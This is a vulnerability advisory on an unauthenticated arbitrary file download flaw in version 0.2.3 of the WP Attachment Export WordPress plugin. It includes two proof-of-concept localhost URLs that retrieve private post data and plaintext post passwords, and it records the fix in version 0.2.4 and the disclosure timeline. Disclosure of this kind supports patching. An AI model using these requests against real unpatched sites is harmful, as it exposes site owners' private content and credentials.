WordPress WP Attachment Export plugin version 0.2.3 suffers from an arbitrary file download vulnerability.
9a85df012d25d9b1b45171c582fc339bdd7bb368f32d4d395882bec6755b8998
# Title: Arbitrary File Download in WP Attachment Export Wordpress Plugin
v0.2.3
# Submitter: Nitin Venkatesh
# Product: WP Attachment Export Wordpress Plugin
# Product URL: https://wordpress.org/plugins/wp-attachment-export/
# Vulnerability Type: Arbitrary File Download
# Affected Versions: v0.2.3
# Tested versions: v0.2.3
# Fixed Version: v0.2.4
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1170732/
# Changelog: https://wordpress.org/plugins/wp-attachment-export/changelog/
# CVE Status: None/Unassigned/Fresh
## Product Information:
WP Attachment Export allows you to export your media library into a
WordPress eXtended RSS or WXR file. You can then use the Tools->Import
function in another WordPress installation to import the media library.
## Vulnerability Description:
The WP Attachment Export Wordpress Plugin v0.2.3 is susceptible to
Arbitrary File Download wherein anyone(unauthenticated user) could download
the XML data that holds all the details of attachments/posts on a Wordpress
powered site. This includes details of even privately published posts and
password protected posts with their passwords revealed in plain text.
## Proof-of-Concept:
Download attachment details:
http://localhost/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true
Download Wordpress content details:
http://localhost/wp-admin/tools.php?content=&wp-attachment-export-download=true
## Solution:
Upgrade to v0.2.4 of the plugin.
## Disclosure Timeline:
2015-05-30 - Mailed report to developer
2015-05-30 - Updated v0.2.4 released
2015-07-14 - Publishing disclosure on FD.
## Disclaimer:
This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.